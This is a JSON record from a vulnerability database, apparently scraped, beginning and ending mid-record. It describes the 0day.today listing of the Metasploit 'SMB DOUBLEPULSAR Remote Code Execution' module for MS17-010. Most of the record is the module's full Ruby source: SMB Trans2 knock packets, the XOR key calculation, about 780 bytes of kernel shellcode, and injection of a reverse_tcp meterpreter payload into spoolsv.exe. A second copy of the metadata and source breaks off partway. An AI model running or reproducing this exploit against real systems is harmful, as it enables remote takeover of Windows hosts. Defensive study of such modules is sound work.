"SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-16T22:30:47", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T22:30:47", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-17] #"}, "lastseen": "2021-09-16T22:30:47", "differentElements": ["sourceData"], "edition": 19}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "1750b808c05248733308d2c3cf531be8", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-20T21:24:01", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-29702"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142603"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-20T21:24:01", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-20T21:24:01", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 